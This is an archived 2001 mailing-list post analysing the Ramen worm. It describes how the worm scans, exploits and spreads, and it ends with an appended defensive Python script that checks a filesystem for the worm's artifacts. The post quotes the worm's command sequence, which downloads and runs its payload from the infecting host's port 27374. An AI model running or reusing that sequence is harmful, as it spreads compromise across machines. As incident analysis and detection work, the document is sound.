Security Incidents mailing list archives

Re: Ramen worm . More details on it. ( found a password and e-mails crypted inside it)


From: Daniel Martin <dtmartin24 () HOME COM>
Date: Tue, 16 Jan 2001 21:41:33 -0500

Mihai Moldovanu <mihaim () PROFM RO> writes:

> I completed reverse engineering the ramen worm. There are 3 crypted text messages in the worm:

Ok, so at this point I've been beaten to the punch by others, but
here's my analysis of this worm.  I hadn't seen an exploitable
hole/backdoor in the asp program, but if Mr. Moldovanu thinks there is
one I'll take a second look at it.

Nothing I say below represents the opinions of anyone but me
personally, and as I'm a bit tired now I may have made mistakes when
typing this up; take appropriate grains of salt.

RAMEN WORM

This worm is currently running around in the wild, as has been
recently noticed on the incidents mailing list.  It appears to be
targeted at Redhat 6.2 and 7.0 systems running either an exploitable
rpc service or a vulnerable wuftpd.

The similarity between this worm and the Honeynet Project's scan-of-the-month
for December (http://project.honeynet.org/scans/scan10/) is striking.
This likely reflects the fact that this worm was cobbled together
from commonly available tools in the cracker (we've got to get a
better name for these people) community.  The fact that the
binaries were treated in an inconsistent manner (not all were
stripped, for example) furthers that impression.

In any case, this worm begins its scan with a modified form of
synscan (http://www.psychoid.lam3rz.de/synscan.html) by psychoid.
Note that the synscan version used in this worm appears to be from an
earlier (i.e. version < 1.6) version of synscan than is now available.
(There are exploit checks in the current version that this version
lacks.)

This modified synscan does a check against the FTP banner (as used in
this worm, only port 21 is checked) for the strings "Mon Feb 28" and
"Wed Aug 9".  If it finds the first it writes the hostname and/or ip
of the scannee to the file ".w"; if it finds the second it writes to the
file ".l" (both in the current directory).  Presumably this serves to
differentiate two breeds of exploitable machines (Redhat 6.2 and Redhat 7.0?).

Then two different scripts launch attacks against the machines named in
those files.  (Actually, the attacks are launched as soon as synscan
identifies the machines; there's much backgrounding of processes done
in the scripts that drive this worm).

The attack plan against machines in the ".w" file (i.e. RedHat 6.2
machines) is to first run a wu-ftpd exploit (it bears the text "venglin",
and I understand that he is the author of at least one publicly available
wu-ftpd exploit); though it appears that the exploit program itself is
designed with SuSe, RedHat 6.2 and FreeBSD in mind, the context of this
worm would in general only have it run against RedHat 6.2 machines.

After this attack, a copy of the widely available statdx exploit for
RedHat 6.2 nfsd's is run against the target machine.  If either attack
succeeds, the sequence of commands executed is:

mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! | mail -s %s -c %s %s

The %s substitutions are, respectively, the IP address of the
infecting machine, IP address/hostname of the infected machine,
"gb31337 () hotmail com" and "gb31337 () yahoo com" (which addresses are by
now most likely disabled by the flood of mail).

Redhat 7 machines are attacked by something that appears to be aimed
at the LPRng syslog format bug, but I can't find anything out about
this tool beyond that.  Since the person making this worm forgot to
strip one of the copies of this tool that is included in the worm,
maybe someone else will fill me in on what tool this is.  In any case,
once that is achieved the same shell commands as before are executed.

Once in, the worm establishes a minimal HTTP/0.9 server on port 27374
to serve out copies of itself (it does this through inetd on RedHat
6.2 and xinetd on RedHat 7.0).  It determines its IP address, and
removes the vulnerable services it uses to spread itself - that is,
on RedHat 6.2 rpc.statd is removed; on RedHat 7.0 lpd is removed.
(One would assume that a remaining vulnerable wu-ftpd could lead
the worm to overwrite itself with subsequent infections of the same
machine.)  Also, just for fun, any writeable index.html files are
replaced with a silly message.

One odd thing I notice is that this worm apparently leaves no backdoor
for its creator to use to gain shell access to the machine.  All I
see is it adding the lines "ftp" and "anonymous" to /etc/ftpusers.
Maybe the creator just wants ftp sites.

And now, the contents of that ramen.tgz file:
  All the binaries are in the archive twice, with RedHat 6.2 and RedHat 7.0
  versions.  Numerous binaries were not stripped, which makes the job of
  taking them apart easier.

asp:       An xinetd config file that will start up the fake webserver
asp62:     HTTP/0.9-compatible server that always serves out the file
           /tmp/ramen.tgz - NOT stripped
asp7:      RedHat 7-compiled version - NOT stripped
bd62.sh:   Does the setup (installing wormserver, removing vulnerable
           programs, adding ftp users) for RedHat 6.2
bd7.sh:    Same for RedHat 7.0
getip.sh:  Utility script to get main external IP address
hackl.sh:  Driver to read the .l file and pass addresses to lh.sh
hackw.sh:  Driver to read the .w file and pass addresses to wh.sh
index.html: HTML document text
l62:       LPRng format string exploit program - NOT stripped
l7:        Same but compiled for RedHat 7 - stripped
lh.sh:     Driver script to execute the LPRng exploit with several
           different options
randb62:   Picks a random class-B subnet to scan on - NOT stripped
randb7:    Same but compiled for RedHat 7 - NOT stripped
s62:       statdx exploit - NOT stripped
s7:        Same but compiled for RedHat 7 - stripped
scan.sh:   get a classB network from randb and run synscan
start.sh:  Replace any index.html with the one from the worm; run getip;
           determine if we're RedHat 6.2 or 7.0 and run the appropriate
           bd*.sh and start*.sh
start62.sh: start (backgrounded) scan.sh, hackl.sh, and hackw.sh
start7.sh:  Same as start62.sh
synscan62:  Modified synscan tool - records to .w and .l files - stripped
synscan7:   Same but compiled for RedHat 7 - stripped
w62:        venglin wu-ftpd exploit - stripped
w7:         Same but compiled for RedHat 7 - stripped
wh.sh:     Driver script to call the "s" and "w" binaries against a given
           target.
wu62:      Apparently a mistake by the author.  "strings" shows it to be
           very similar to w62; nowhere is it ever invoked.

I'll leave it to others to draw their own conclusions.  I will point out
that it appears that this worm was not carefully constructed as much as
it was snapped together.  I strongly doubt that the author (or with a
compilation such as this, would "editor" be a more appropriate term?)
of this worm wrote any of the binaries himself (*) with the exception
of the HTTP/0.9 server.  (the asp* programs)  I'll also note that 27374
is a common (arguably the most common) windows trojan port, so it's not
too unusual to see lots of questionable activity on that port number.  I'm
not certain what (if anything) the worm author hoped to gain by using this
port as well.  (If you get the response "PWD" or "RPL[002]" from this
port, you're seeing the windows trojan subseven or something
masquerading as subseven)

(*) Yeah, gender bias.  I'll use all female pronouns the next time I take
a worm like this apart, ok?
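Added example (mine, not from the original post and not the worm's code): a Python sweep a defender can run over a live root or a mounted image for the artifacts the analysis above lists (the /usr/src/.poop directory, /tmp/ramen.tgz, an inetd/xinetd entry on port 27374, and the "ftp"/"anonymous" lines in /etc/ftpusers). The xinetd file name /etc/xinetd.d/asp and its layout are assumptions, and the sample tree is constructed.

```python
import os
import tempfile

WORM_PORT = "27374"  # port of the worm's HTTP/0.9 server

def _read(path):
    """Return a file's text, or "" if it is missing or unreadable."""
    try:
        with open(path, encoding="latin-1") as fh:
            return fh.read()
    except OSError:
        return ""

def ramen_indicators(root="/"):
    """Sweep `root` (live host or mounted image) for Ramen artifacts."""
    hits = []
    if os.path.isdir(os.path.join(root, "usr/src/.poop")):
        hits.append("dir:/usr/src/.poop")
    if os.path.isfile(os.path.join(root, "tmp/ramen.tgz")):
        hits.append("file:/tmp/ramen.tgz")
    # Worm server registered with inetd (RedHat 6.2) or xinetd (RedHat 7.0)
    if WORM_PORT in _read(os.path.join(root, "etc/inetd.conf")):
        hits.append("inetd:" + WORM_PORT)
    xdir = os.path.join(root, "etc/xinetd.d")
    if os.path.isdir(xdir):
        for name in sorted(os.listdir(xdir)):
            if WORM_PORT in _read(os.path.join(xdir, name)):
                hits.append("xinetd:" + name)
    # Weak on its own: many admins add these two lines deliberately.
    users = {l.strip() for l in _read(os.path.join(root, "etc/ftpusers")).splitlines()}
    if {"ftp", "anonymous"} <= users:
        hits.append("ftpusers:ftp,anonymous")
    return hits

def build_sample_root(root):
    """Constructed tree mimicking an infected RedHat 7.0 box (not real data)."""
    for d in ("usr/src/.poop", "tmp", "etc/xinetd.d"):
        os.makedirs(os.path.join(root, d))
    open(os.path.join(root, "tmp/ramen.tgz"), "wb").close()
    with open(os.path.join(root, "etc/xinetd.d/asp"), "w") as fh:  # assumed name/layout
        fh.write("service asp\n{\n\tport = 27374\n\tsocket_type = stream\n}\n")
    with open(os.path.join(root, "etc/ftpusers"), "w") as fh:
        fh.write("root\nbin\nftp\nanonymous\n")
    return root

def demo():
    """Run the sweep on the constructed infected tree and on an empty one."""
    with tempfile.TemporaryDirectory() as bad, tempfile.TemporaryDirectory() as clean:
        return ramen_indicators(build_sample_root(bad)), ramen_indicators(clean)
```

demo() returns the four hits for the constructed tree and an empty list for the clean one; ramen_indicators("/") runs the same sweep on the live host, and a listener on 27374 (netstat) is the complementary live check.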
